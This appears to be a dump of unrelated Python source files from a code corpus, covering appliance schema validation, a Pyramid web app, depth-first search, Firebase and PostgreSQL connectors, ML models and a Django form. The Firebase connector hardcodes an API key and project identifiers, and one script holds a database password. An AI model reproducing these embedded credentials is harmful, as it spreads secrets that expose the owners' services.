jsonschema import validate, RefResolver, Draft4Validator\nfrom os.path import join\n\nfrom object_concatenation import (concatenate_complete_object, get_ancestors, \n merge_dicts, ObjectConcatenationError)\nfrom file_management import get_schema_directory\nfrom schema_preprocessing import combine, local_validate\n\ndef concatenate_complete_appliance(appliance_obj, object_cache):\n parent_name = appliance_obj['parent']\n complete_appliance = concatenate_complete_object(parent_name, object_cache,\n child_object=appliance_obj).copy()\n ########################\n # Check subtype is valid\n subtype = complete_appliance.get('subtype')\n subtypes = complete_appliance.get('subtypes')\n if subtype and (not subtypes or subtype not in subtypes):\n msg = (\"'{}' is not a valid subtype for appliance '{}'\"\n .format(subtype, parent_name))\n raise ObjectConcatenationError(msg)\n\n ############################################\n # Remove properties not allowed in completed appliance object\n for property_to_remove in ['subtypes', 'all_allowed_components', 'do_not_inherit']:\n complete_appliance.pop(property_to_remove, None)\n\n # Instantiate components recursively\n components = complete_appliance.get('components', [])\n for i, component_obj in enumerate(components):\n component_obj = concatenate_complete_appliance(component_obj, object_cache)\n\n components[i] = component_obj\n if complete_appliance.get('categories'):\n merge_dicts(complete_appliance['categories'], \n component_obj.get('categories', {}))\n\n return complete_appliance\n\n\ndef validate_complete_appliance(complete_appliance):\n # Load appliance schema and combine all 'allOf' keys\n schema_filename = join(get_schema_directory(), 'appliance.json')\n appliance_schema = json.load(open(schema_filename))\n combine(appliance_schema)\n\n # Update the schema with additional properties from the appliance\n additional_properties = complete_appliance.pop('additional_properties', {})\n appliance_schema['properties'].update(additional_properties)\n\n # Validate\n local_validate(complete_appliance, appliance_schema)\n \n # Validate each component recursively\n components = complete_appliance.get('components', [])\n for component_obj in components:\n validate_complete_appliance(component_obj)\n","sub_path":"nilm_metadata/appliance.py","file_name":"appliance.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"557246361","text":"from pyramid.config import Configurator\nfrom pyramid.httpexceptions import HTTPNotFound\n\nfrom dropbox import DropboxContainer\ndropbox_container = DropboxContainer()\n\nfrom pyramid.i18n import TranslationStringFactory\n_ = TranslationStringFactory('briefkasten')\n\n\ndef dropbox_factory(request):\n try:\n return dropbox_container.get_dropbox(request.matchdict['drop_id'])\n except KeyError:\n raise HTTPNotFound('no such dropbox')\n\n\ndef dropbox_editor_factory(request):\n dropbox = dropbox_factory(request)\n if dropbox.editor_token == request.matchdict['editor_token']:\n return dropbox\n else:\n raise HTTPNotFound('invalid editor token')\n\n\ndef german_locale(request):\n return 'de'\n\n\ndef main(global_config, **settings):\n \"\"\" Configure and create the main application. \"\"\"\n config = Configurator(settings=settings, locale_negotiator=german_locale)\n config.add_translation_dirs('briefkasten:locale')\n config.add_static_view('briefkasten/static/deform', 'deform:static')\n config.add_static_view('briefkasten/static', 'briefkasten:static')\n config.include('pyramid_deform')\n config.add_route('fingerprint', '/briefkasten/fingerprint')\n config.add_route('dropbox_form', '/briefkasten/submit')\n config.add_route('dropbox_editor', '/briefkasten/{drop_id}/{editor_token}', factory=dropbox_editor_factory)\n config.add_route('dropbox_view', '/briefkasten/{drop_id}', factory=dropbox_factory)\n config.scan()\n dropbox_container.init(settings)\n return config.make_wsgi_app()\n","sub_path":"src/briefkasten/briefkasten/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"535366904","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 12 11:48:05 2019\n\nDepth First Search algoritm\n\n@author: stvyh\n\"\"\"\n\ndef load_dict():\n tree={}\n tree['A']=['B','F']\n tree['B']=['C','D']\n tree['C']=[]\n tree['E']=['K']\n tree['F']=['G','I','J']\n tree['G']=[]\n tree['I']=['F']\n tree['D']=['E','H','J']\n tree['J']=[]\n tree['H']=['I']\n tree['K']=['H']\n \n return tree\n\ndef DFSearchPrt(node,goal,path,best_path,level,tree):\n level += 1\n wpath = path.copy()\n level_path = path.copy()\n test_path = None\n wpath.append(node)\n\n print()\n print((\" \" * (3*level+8) )[-(3*level+8):],node, ' above ',tree[node])\n print((\" \" * (3*level) )[-(3*level):],'level '+str(level)+' =============================================')\n print((\" \" * (3*level+5) )[-(3*level+5):],'-->node',node,'path start',wpath,level_path)\n print('level',level,'node',node,'path start',path)\n input('kuk')\n \n if node == goal: \n if len(best_path) > len(wpath): best_path=wpath.copy()\n print('mam ho!',wpath,level_path,best_path)\n# prev_node=None\n return (None,best_path) \n \n if tree[node] == []: \n print((\" \" * (3*level+5) )[-(3*level+5):],' ### nikam ###, node ',node, wpath )\n return (None,best_path)\n\n# \n# print((\" \" * (3*level+5) )[-(3*level+5):],' path appended ',node,' ===> ',path,level_path)\n# print((\" \" * (3*level+5) )[-(3*level+5):],' tree node',tree[node])\n\n i = 1\n for item in tree[node]:\n if not item in path:\n print()\n print((\" \" * (3*level+5) )[-(3*level+5):],' i:'+str(i)+' for item',item,'tree node',tree[node])\n i += 1\n test_path,best_path=DFSearch(item,goal,wpath,best_path,level,tree)\n if test_path != None:\n wpath = test_path.copy()\n if test_path == None: path = level_path.copy() #pre_path\n return (level_path,best_path)\n\ndef DFSearch(node,goal,path,best_path,tree):\n wpath = path.copy()\n level_path = path.copy()\n test_path = None\n wpath.append(node)\n \n if node == goal: \n if len(best_path) > len(wpath): best_path=wpath.copy()\n print(best_path)\n return (None,best_path) \n \n if tree[node] == []: \n return (None,best_path)\n\n for item in tree[node]:\n if not item in path:\n test_path,best_path=DFSearch(item,goal,wpath,best_path,tree)\n if test_path != None:\n wpath = test_path.copy()\n if test_path == None: path = level_path.copy() #pre_path\n return (level_path,best_path)\n\ntree = load_dict()\npath =[]\nbest_path=[]\nprint('Candidates:') \npath, best_path = DFSearch('A','J',path,['X' for i in range(0,100)],tree)\nprint('=====================================')\nprint('The best one is:', best_path)\n \n\n","sub_path":"Examples/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"217837153","text":"import pyrebase\nimport requests\nimport os\nfrom central.log import log\nfrom central.models import Configuracoes\nfrom central.util import check_host\n\nclass ConectaFirebase:\n auth = None\n db = None\n _user = None\n _token = None\n\n def __init__(self):\n try:\n if(check_host()==False):\n log('CFB01.0',\"Sem conexão\")\n return None\n cfg = Configuracoes.objects.get()\n config = {\n \"apiKey\": \"AIzaSyCaYACeZvP5sW7MHKA5co7PttejxUxnTTM\",\n \"authDomain\": \"testes-apisensores.firebaseapp.com\",\n \"databaseURL\": \"https://testes-apisensores.firebaseio.com\",\n \"storageBucket\": \"testes-apisensores.appspot.com\",\n \"messagingSenderId\": \"475937382333\",\n \"serviceAccount\": os.path.dirname(os.path.abspath(__file__)) + '/testes-apiSensores-cba45d38c53e.json'\n }\n firebase = pyrebase.initialize_app(config)\n # Get a reference to the auth service\n ConectaFirebase.auth = firebase.auth()\n # Get a reference to the database service\n ConectaFirebase.db = firebase.database()\n except Exception as e:\n log('CFB01.1',str(e))\n return None\n \n def getUser():\n try:\n cfg = Configuracoes.objects.get()\n if(ConectaFirebase._token==None): \n # ConectaFirebase._token= ConectaFirebase.auth.create_custom_token(cfg.uidCentral)\n ConectaFirebase._token= ConectaFirebase.auth.create_custom_token('-KbztEuoaYejBSl-nyFx')\n ConectaFirebase._user = ConectaFirebase.auth.sign_in_with_custom_token(ConectaFirebase._token)\n return ConectaFirebase._user\n except requests.exceptions.HTTPError as e:\n e = eval(e.strerror)\n log('CFB01.2',e['error']['message'])\n ConectaFirebase._token = None\n return False\n except Exception as e:\n log('CFB01.3',str(e))\n ConectaFirebase._token = None\n return False\n","sub_path":"interface/central/firebase/conectaFirebase.py","file_name":"conectaFirebase.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"515856805","text":"# -*- mode:python; coding:utf-8 -*-\n\n# Copyright (c) 2020 IBM Corp. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for trestle elements module.\"\"\"\nfrom datetime import datetime\nfrom typing import List\n\nfrom trestle.core.err import TrestleError\nfrom trestle.core.models.elements import Element, ElementPath\nfrom trestle.oscal import target\n\n\ndef test_element_get_at(sample_target: target.TargetDefinition):\n \"\"\"Test element get method.\"\"\"\n element = Element(sample_target)\n\n assert element.get() == sample_target\n assert element.get_at() == element.get()\n assert element.get_at(ElementPath('metadata')) == sample_target.metadata\n assert element.get_at(ElementPath('metadata.title')) == sample_target.metadata.title\n assert element.get_at(ElementPath('targets')) == sample_target.targets\n assert element.get_at(ElementPath('targets.*')) == sample_target.targets\n assert element.get_at(ElementPath('metadata.parties.*')) == sample_target.metadata.parties\n assert element.get_at(ElementPath('metadata.parties.0')) == sample_target.metadata.parties[0]\n assert element.get_at(ElementPath('metadata.parties.0.uuid')) == sample_target.metadata.parties[0].uuid\n\n # invalid indexing\n assert element.get_at(ElementPath('metadata.title.0')) is None\n\n\ndef test_element_set_at(sample_target: target.TargetDefinition):\n \"\"\"Test element get method.\"\"\"\n element = Element(sample_target)\n\n metadata = target.Metadata(\n **{\n 'title': 'My simple catalog',\n 'last-modified': datetime.now(),\n 'version': '0.0.0',\n 'oscal-version': '1.0.0-Milestone3'\n }\n )\n\n title: target.Title = target.Title(__root__='TEST')\n\n parties: List[target.Party] = []\n parties.append(\n target.Party(**{\n 'uuid': 'ff47836c-877c-4007-bbf3-c9d9bd805000', 'party-name': 'TEST1', 'type': 'organization'\n })\n )\n parties.append(\n target.Party(**{\n 'uuid': 'ee88836c-877c-4007-bbf3-c9d9bd805000', 'party-name': 'TEST2', 'type': 'organization'\n })\n )\n\n assert element.set_at(ElementPath('metadata'), metadata).get_at(ElementPath('metadata')) == metadata\n assert element.set_at(ElementPath('metadata.title'), title).get_at(ElementPath('metadata.title')) == title\n\n assert element.set_at(ElementPath('metadata.parties'), parties).get_at(ElementPath('metadata.parties')) == parties\n assert element.set_at(ElementPath('metadata.parties.*'), parties).get_at(ElementPath('metadata.parties')) == parties\n\n # unset\n assert element.set_at(ElementPath('metadata.parties'), None).get_at(ElementPath('metadata.parties')) is None\n\n # string element path\n assert element.set_at('metadata.parties', parties).get_at(ElementPath('metadata.parties')) == parties\n\n try:\n assert element.set_at(ElementPath('metadata.title'), parties).get_at(ElementPath('metadata.parties')) == parties\n except TrestleError:\n pass\n\n # wildcard requires it to be an OscalBaseModel or list\n try:\n assert element.set_at(ElementPath('metadata.parties.*'), 'INVALID')\n except TrestleError:\n pass\n\n # invalid attribute\n try:\n assert element.set_at(ElementPath('metadata.groups.*'), parties)\n except TrestleError:\n pass\n\n\ndef test_element_str(sample_target):\n \"\"\"Test for magic method str.\"\"\"\n element = Element(sample_target)\n assert str(element) == 'TargetDefinition'\n","sub_path":"tests/trestle/core/models/element_test.py","file_name":"element_test.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"12485131","text":"import torch\nimport torch.nn.functional as F\nfrom utils.utils import bilinear_sampler, coords_grid\n\ntry:\n import alt_cuda_corr\nexcept:\n # alt_cuda_corr is not compiled\n pass\n\n\nclass CorrBlock:\n def __init__(self, fmap1, fmap2, num_levels=4, radius=4):\n self.num_levels = num_levels\n self.radius = radius\n self.corr_pyramid = []\n\n self.fmap1 = fmap1\n self.fmap2 = fmap2\n\n def corr(self, fmap1, fmap2, coords):\n\n B, D, H, W = fmap2.shape\n fmap1 = fmap1.unsqueeze(dim=-1)\n fmap2 = fmap2.unsqueeze(dim=-1)\n\n # map grid coordinates to [-1,1]\n xgrid, ygrid = coords.split([1,1], dim=-1)\n xgrid = 2*xgrid/(W-1) - 1\n ygrid = 2*ygrid/(H-1) - 1\n zgrid = torch.zeros_like(xgrid) - 1\n grid = torch.cat([zgrid, xgrid, ygrid], dim=-1)\n\n fmapw = F.grid_sample(fmap2, grid, align_corners=True)\n\n corr = torch.sum(fmap1*fmapw, dim=1)\n return corr / torch.sqrt(torch.tensor(D).float())\n\n def __call__(self, coords):\n\n r = self.radius\n coords = coords.permute(0, 2, 3, 1)\n batch, h1, w1, _ = coords.shape\n\n fmap1 = self.fmap1\n fmap2 = self.fmap2\n\n out_pyramid = []\n for i in range(self.num_levels):\n dx = torch.linspace(-r, r, 2*r+1)\n dy = torch.linspace(-r, r, 2*r+1)\n delta = torch.stack(torch.meshgrid(dy, dx), axis=-1).to(coords.device)\n\n centroid_lvl = coords.reshape(batch, h1, w1, 1, 2) / 2**i\n coords_lvl = centroid_lvl + delta.view(-1, 2)\n\n corr = self.corr(fmap1, fmap2, coords_lvl)\n fmap2 = F.avg_pool2d(fmap2, 2, stride=2)\n out_pyramid.append(corr)\n\n out = torch.cat(out_pyramid, dim=-1)\n return out.permute(0, 3, 1, 2).contiguous().float()\n\nclass CorrLayer(torch.autograd.Function):\n @staticmethod\n def forward(ctx, fmap1, fmap2, coords, r):\n fmap1 = fmap1.contiguous()\n fmap2 = fmap2.contiguous()\n coords = coords.contiguous()\n ctx.save_for_backward(fmap1, fmap2, coords)\n ctx.r = r\n corr, = correlation_cudaz.forward(fmap1, fmap2, coords, ctx.r)\n return corr\n\n @staticmethod\n def backward(ctx, grad_corr):\n fmap1, fmap2, coords = ctx.saved_tensors\n grad_corr = grad_corr.contiguous()\n fmap1_grad, fmap2_grad, coords_grad = \\\n correlation_cudaz.backward(fmap1, fmap2, coords, grad_corr, ctx.r)\n return fmap1_grad, fmap2_grad, coords_grad, None\n\n\nclass AlternateCorrBlock:\n def __init__(self, fmap1, fmap2, num_levels=4, radius=4):\n self.num_levels = num_levels\n self.radius = radius\n\n self.pyramid = [(fmap1, fmap2)]\n for i in range(self.num_levels):\n fmap1 = F.avg_pool2d(fmap1, 2, stride=2)\n fmap2 = F.avg_pool2d(fmap2, 2, stride=2)\n self.pyramid.append((fmap1, fmap2))\n\n def __call__(self, coords):\n\n coords = coords.permute(0, 2, 3, 1)\n B, H, W, _ = coords.shape\n\n corr_list = []\n for i in range(self.num_levels):\n r = self.radius\n fmap1_i = self.pyramid[0][0].permute(0, 2, 3, 1)\n fmap2_i = self.pyramid[i][1].permute(0, 2, 3, 1)\n\n coords_i = (coords / 2**i).reshape(B, 1, H, W, 2).contiguous()\n corr = alt_cuda_corr(fmap1_i, fmap2_i, coords_i, r)\n corr_list.append(corr.squeeze(1))\n\n corr = torch.stack(corr_list, dim=1)\n corr = corr.reshape(B, -1, H, W)\n return corr / 16.0\n","sub_path":"core/corr.py","file_name":"corr.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"205598131","text":"#Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport unittest\nimport numpy as np\nimport paddle.fluid as fluid\nimport paddle.fluid.layers as layers\nimport paddle.fluid.core as core\nfrom paddle.fluid import compiler, Program, program_guard\nfrom paddle.fluid.op import Operator\nfrom paddle.fluid.backward import append_backward\n\n\nclass TestLoDAppendAPI(unittest.TestCase):\n def test_api(self, use_cuda=False):\n main_program = Program()\n with fluid.program_guard(main_program):\n x = fluid.layers.data(name='x', shape=[6], dtype='float32')\n level = fluid.layers.data(\n name='level', shape=[3], dtype='int32', lod_level=0)\n result = fluid.layers.lod_append(x, level)\n\n x_i = np.array([1.0, 1.0, 1.0, 1.0, 1.0, 1.0]).astype(\"float32\")\n level_i = np.array([0, 2, 6]).astype(\"int32\")\n\n for use_cuda in [False, True]:\n if use_cuda and not fluid.core.is_compiled_with_cuda():\n return\n place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()\n exe = fluid.Executor(place)\n [out] = exe.run(fluid.default_main_program(),\n feed={'x': x_i,\n 'level': level_i},\n fetch_list=[result],\n return_numpy=False)\n self.assertEqual(out.recursive_sequence_lengths(), [[2, 4]])\n\n\nclass TestLodAppendOpError(unittest.TestCase):\n def test_error(self):\n # The input(x) must be Variable.\n x1 = np.array([0.9383, 0.1983, 3.2, 1.2]).astype(\"float64\")\n level1 = [0, 2, 4]\n self.assertRaises(TypeError, fluid.layers.lod_append, x1, level1)\n\n #The input(level) must be Variable or list.\n x2 = fluid.layers.data(name='x2', shape=[4], dtype='float32')\n self.assertRaises(ValueError, fluid.layers.lod_append, x2, 2)\n\n # Input(x) dtype must be float32 or float64 or int32 or int64\n for dtype in [\"bool\", \"float16\"]:\n x3 = fluid.layers.data(name='x3_' + dtype, shape=[4], dtype=dtype)\n level3 = fluid.layers.data(\n name='level3' + dtype, shape=[4], dtype='int32', lod_level=2)\n self.assertRaises(TypeError, fluid.layers.lod_append, x3, level3)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"python/paddle/fluid/tests/unittests/test_lod_append_op.py","file_name":"test_lod_append_op.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"210959547","text":"\"\"\"Gets the data from the database and creates\nmetadata. In this instance, it looks for bad\nhdop and saves the results in a csv-file.\n\"\"\"\n\nimport math\nimport csv\nimport psycopg2\n\nDATABASE = \"project56web\"\nUSERNAME = \"postgres\"\nHOSTNAME = \"localhost\"\nPASSWORD = \"abcdef\"\n\nCONNECTION = None\n\n\ndef connect_database():\n \"\"\"Connects to the database\n :return connection: the connection\n \"\"\"\n\n input_string = \"dbname='{0}' user='{1}' host='{2}' password='{3}'\"\n format__string = input_string.format(DATABASE, USERNAME, HOSTNAME, PASSWORD)\n connection = psycopg2.connect(format__string)\n return connection\n\n\ndef get_bad_hdop(connection):\n \"\"\"Gets the bad HDOPs from the database\n makes a csv file for all the bad locations\n\n :param connection: a connection to the database\n \"\"\"\n\n get_hdop_string = \"SELECT * FROM positions WHERE hdop > 5 AND quality != 'DrOnly';\"\n radius = 100\n name = \"badhdop\"\n top_row = [\"rdx\", \"rdy\", \"radius\", \"quality\", \"amount\"]\n\n cur = connection.cursor()\n cur.execute(get_hdop_string)\n results = cur.fetchall()\n cur.close()\n\n #So many problem results!\n print(\"All results: \" + str(len(results)))\n\n problem_range = [[results[0][2], results[0][3], 100, results[0][8], 1]]\n\n for result in results:\n in_radius = False\n result_positions = [result[2], result[3]]\n\n for problem in problem_range:\n problem_positions = [problem[0], problem[1]]\n\n if calculate_in_range(result_positions, problem_positions, radius):\n in_radius = True\n new_problem_type = True\n\n for i in range(0, len(problem)):\n if problem[i] == result[8]:\n problem[i + 1] = str(int(problem[i + 1]) + 1)\n new_problem_type = False\n break\n\n if new_problem_type:\n problem.append(result[8])\n problem.append(1)\n\n break\n\n if not in_radius:\n problem_range.append([result[2], result[3], radius, result[8], 1])\n\n #So many unique problem results!\n print(\"Unique results: \" + str(len(problem_range)))\n create_csv(name, top_row, problem_range)\n\n\ndef calculate_in_range(first_pos, second_pos, radius):\n \"\"\"Calculates the distance from 2 objects and return True if they\n are in range\n\n :param first_pos: a list of the x and y positions\n :param second_pos: a list of the x and y positions to compare to\n :param radius: these two objects must be within this range\n :return: returns True if they are in range\n \"\"\"\n x_distance = math.pow(first_pos[0] - second_pos[0], 2)\n y_distance = math.pow(first_pos[1] - second_pos[1], 2)\n total_distance = math.sqrt(x_distance + y_distance)\n return total_distance < radius\n\n\ndef create_csv(name, top_row, data):\n \"\"\"Creates csv file\n\n :param name: name of the csv\n :param top_row: what has to be displayed on the top row\n :param data: data to insert\n \"\"\"\n csvname = name + \".csv\"\n with open(csvname, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(top_row)\n\n for row in data:\n writer.writerow(row)\n\n\nif __name__ == \"__main__\":\n CONNECTION = connect_database()\n get_bad_hdop(CONNECTION)\n CONNECTION.close()\n","sub_path":"pythonspul/metadata2.py","file_name":"metadata2.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"233516334","text":"\nimport tensorflow as tf\n\nclass Network:\n def __init__(self, n_hid1=30, n_hid2=30, learning_rate=0.01):\n self.n_in = 784\n self.n_hid1 = n_hid1\n self.n_hid2 = n_hid2\n self.n_out = 10\n\n self.x = tf.placeholder(tf.float32, [None, 784])\n self.t = tf.placeholder(tf.float32, [None, 10])\n self.y = self._inference()\n\n self.loss = self._loss(self.y, self.t)\n self.train_step = self._training(self.loss, learning_rate=learning_rate)\n\n self.correct_prediction = tf.equal(tf.argmax(self.y, 1), tf.argmax(self.t, 1))\n self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))\n\n self.saver = tf.train.Saver()\n self.sess = tf.Session()\n init = tf.global_variables_initializer()\n self.sess.run(init)\n\n def _inference(self):\n def _weight_variable(shape):\n # randomは値固定とする\n initial = tf.truncated_normal(shape, mean=0.0, stddev=1.0)\n return tf.Variable(initial)\n\n def _bias_variable(shape):\n initial = tf.zeros(shape, dtype=tf.float32)\n return tf.Variable(initial)\n\n # InputLayer -> Hidden-1-Layer\n W1 = _weight_variable(shape=[self.n_in, self.n_hid1])\n b1 = _bias_variable(shape=[self.n_hid1])\n f1 = tf.matmul(self.x, W1) + b1\n # f1_out = self._LeakyReLU(f1)\n f1_out = tf.nn.sigmoid(f1)\n\n # Hidden-1-Layer -> Hidden-2-Layer\n W2 = _weight_variable(shape=[self.n_hid1, self.n_hid2])\n b2 = _bias_variable(shape=[self.n_hid2])\n f2 = tf.matmul(f1_out, W2) + b2\n # f2_out = self._LeakyReLU(f2)\n f2_out = tf.nn.sigmoid(f2)\n\n # Hidden-2-Layer -> OutputLayer\n W3 = _weight_variable(shape=[self.n_hid2, self.n_out])\n b3 = _bias_variable(shape=[self.n_out])\n f3 = tf.matmul(f2_out, W3) + b3\n f3_out = tf.nn.softmax(f3)\n\n y = f3_out\n return y\n\n def _loss(self, y, t):\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(t * tf.log(y + 1.0**-8), reduction_indices=[1]))\n return cross_entropy\n\n def _training(self, loss, learning_rate, beta1=0.9, beta2=0.999):\n optimizer = \\\n tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=beta1, beta2=beta2)\n # optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n\n train_step = optimizer.minimize(loss)\n return train_step\n\n def _LeakyReLU(self, f, a=0.2):\n return tf.maximum(f, f * a)\n\n\n\n","sub_path":"ga_nn/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"247217131","text":"# This code will receive how many notes the user wants\r\n# And find the average between all the notes\r\n\r\nx = int(input(\"Enter how many notes you have:\")) # Input how many notes do you want to enter\r\ntotal = 0 # total = the sum of all notes \r\n\r\nfor i in range(x): # For i less than input\r\n note = float(input(\"Enter the value:\")) # Enter the notes\r\n total += note # Add notes to total\r\nprint(total / x, \"= Average note.\") # Print the average\r\n","sub_path":"wiki.python.org.br/Repeat_Structure/19 Average_Notes.py","file_name":"19 Average_Notes.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"218775992","text":"import csv\nimport cv2\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\n\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import models\nfrom tensorflow.keras import Sequential\n\ndef datasetGen():\n with open('simdata/driving_log.csv') as log_file:\n log_reader = csv.DictReader(log_file)\n X = []\n y = []\n steering_offset = 0.4\n\n for row in log_reader:\n centerImage = mpimg.imread(row['center'].strip().replace('/home/era/Projects/Work/simdata', 'simdata'))\n flippedCenterImage = np.fliplr(centerImage)\n centerSteering = float(row['steering'])\n\n leftImage = mpimg.imread(row['left'].strip().replace('/home/era/Projects/Work/simdata', 'simdata'))\n flippedLeftImage = np.fliplr(leftImage)\n leftSteering = centerSteering + steering_offset\n\n rightImage = mpimg.imread(row['right'].strip().replace('/home/era/Projects/Work/simdata', 'simdata'))\n flippedRightImage = np.fliplr(rightImage)\n rightSteering = centerSteering - steering_offset\n \n X.append(centerImage)\n X.append(flippedCenterImage)\n X.append(leftImage)\n X.append(flippedLeftImage)\n X.append(rightImage)\n X.append(flippedRightImage)\n \n y.append(centerSteering)\n y.append(-centerSteering)\n y.append(leftSteering)\n y.append(-leftSteering)\n y.append(rightSteering)\n y.append(-rightSteering)\n\n X = np.array(X)\n y = np.array(y)\n \n return X, y\n\ndef model():\n model = Sequential()\n\n model.add(layers.Conv2D(8, \n kernel_size=(5, 5), \n strides=(2, 2), \n activation='relu', \n input_shape=(160, 320, 3), \n padding='same'))\n\n model.add(layers.Conv2D(16, \n kernel_size=(5, 5), \n strides=(2, 2), \n activation='relu', \n padding='valid'))\n\n model.add(layers.AveragePooling2D(pool_size=(2, 2), \n strides=(1, 1), \n padding='valid'))\n\n model.add(layers.Conv2D(32, \n kernel_size=(5, 5), \n strides=(2, 2), \n activation='relu', \n padding='valid'))\n\n model.add(layers.Conv2D(32, \n kernel_size=(3, 3), \n strides=(2, 2), \n activation='relu', \n padding='valid'))\n\n model.add(layers.AveragePooling2D(pool_size=(2, 2), \n strides=(1, 1), \n padding='valid'))\n\n model.add(layers.Conv2D(64, \n kernel_size=(3, 3), \n strides=(1, 1), \n activation='relu', \n padding='valid'))\n\n model.add(layers.Conv2D(64, \n kernel_size=(3, 3), \n strides=(1, 1), \n activation='relu', \n padding='valid'))\n\n model.add(layers.Dropout(0.5))\n\n model.add(layers.Flatten())\n\n model.add(layers.Dense(1024, activation='linear'))\n\n model.add(layers.Dense(512, activation='linear'))\n\n model.add(layers.Dense(64, activation='linear'))\n\n model.add(layers.Dense(8, activation='linear'))\n\n model.add(layers.Dense(1, activation='linear'))\n\n model.compile(loss='mse', optimizer='adam')\n\n return model\n\nX, y = datasetGen()\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.33, random_state=42) \n\nmodel = model()\nmodel.summary()\n\nmodel.fit(X_train, y_train, \n epochs=8, \n batch_size=512,\n validation_data=(X_valid, y_valid))\n\nmodel.save('model.h5')","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"160802606","text":"from turtle import *\ndef carre(taille, couleur):\n \"fonction qui dessine un carré de taille et de couleur déterminées\"\n color(couleur)\n c =0\n while c <4:\n forward(taille)\n right(90)\n c = c + 1\n\nif __name__ == \"__main__\":\n \n up() # relever le crayon\n goto(-150, 50) # reculer en haut à gauche\n for i in range(10):# dessiner dix carrés rouges, alignés :\n down() # abaisser le crayon\n carre(25, 'red') # tracer un carré\n up() # relever le crayon\n forward(30) # avancer + loin\n down()\n\n","sub_path":"Pyhton/EXO/10carre.py","file_name":"10carre.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"101215579","text":"from crispy_forms.bootstrap import FormActions\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Row, Div, Field\nfrom django import forms\n\nfrom backend_apps.utils.forms import smtSave, btnCancel, btnReset\nfrom ..models.cliente import Cliente\nfrom ..models.departamento import Departamento\nfrom ..models.provincia import Provincia\n\n\nclass ClienteForm(forms.ModelForm):\n class Meta:\n model = Cliente\n exclude = ('created_at', 'updated_at', \"user\", \"es_juridico\")\n\n def clean_nro_documento(self):\n cleaned_data = super(ClienteForm, self).clean()\n tipo_documento = cleaned_data.get(\"tipo_documento\")\n nro_documento = cleaned_data.get(\"nro_documento\")\n try:\n int(nro_documento)\n except:\n raise forms.ValidationError(u\"No es número\")\n if tipo_documento.codigo == '1': # es dni\n if len(str(nro_documento)) != 8:\n raise forms.ValidationError('No son 8 Digitos para DNI')\n if tipo_documento.codigo == '6': # es RUnc\n if len(str(nro_documento)) != 11:\n raise forms.ValidationError('No son 11 Digitos para RUC')\n\n return nro_documento\n\n def __init__(self, *args, **kwargs):\n super(ClienteForm, self).__init__(*args, **kwargs)\n self.fields['departamento'] = forms.ModelChoiceField(\n label=\"Departamento\", required=False,\n queryset=Departamento.objects.all(),\n help_text=u' %s' %\n u' ',\n )\n self.fields['provincia'] = forms.ModelChoiceField(\n label=\"Provincia\", required=False,\n queryset=Provincia.objects.all(),\n help_text=u' %s' %\n u' ',\n )\n self.helper = FormHelper()\n self.helper.form_method = 'post'\n self.helper.attrs['autocomplete'] = \"off\"\n self.helper.form_class = 'js-validate form-vertical'\n self.helper.layout = Layout(\n Row(\n Div(Field('nombres', css_class='input-required'), css_class='col-md-3'),\n 